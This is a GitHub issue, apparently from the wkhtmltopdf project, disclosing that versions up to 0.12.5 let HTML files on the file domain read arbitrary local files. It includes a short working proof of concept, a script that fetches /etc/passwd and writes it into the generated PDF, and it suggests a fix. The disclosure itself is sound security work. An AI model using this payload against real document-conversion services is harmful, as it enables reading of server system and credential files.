This repository was archived by the owner on Jan 2, 2023. It is now read-only.
This repository was archived by the owner on Jan 2, 2023. It is now read-only.
The same origin policy allows local files to be read by default #4536
Description
wkhtmltopdf version(s) affected:
all version ( <=0.12.5 )
OS information
All supported OS
Description
Because the same-origin policy is not strict enough, the html files under the file domain can read any files.
How to reproduce
Create an HTML file named 111.html
The file contents are as follows.
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<body>
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
</body></html>
Convert HTML to PDF:
wkhtmltopdf /tmp/111.html /tmp/result.pdf
Expected behavior
View the file named result.pdf contents, you will see the contents of the file /etc/passwd!
Possible Solution
Make a strict same-origin policy or set a security option, to prevent HTML documents under the file domain from reading any files.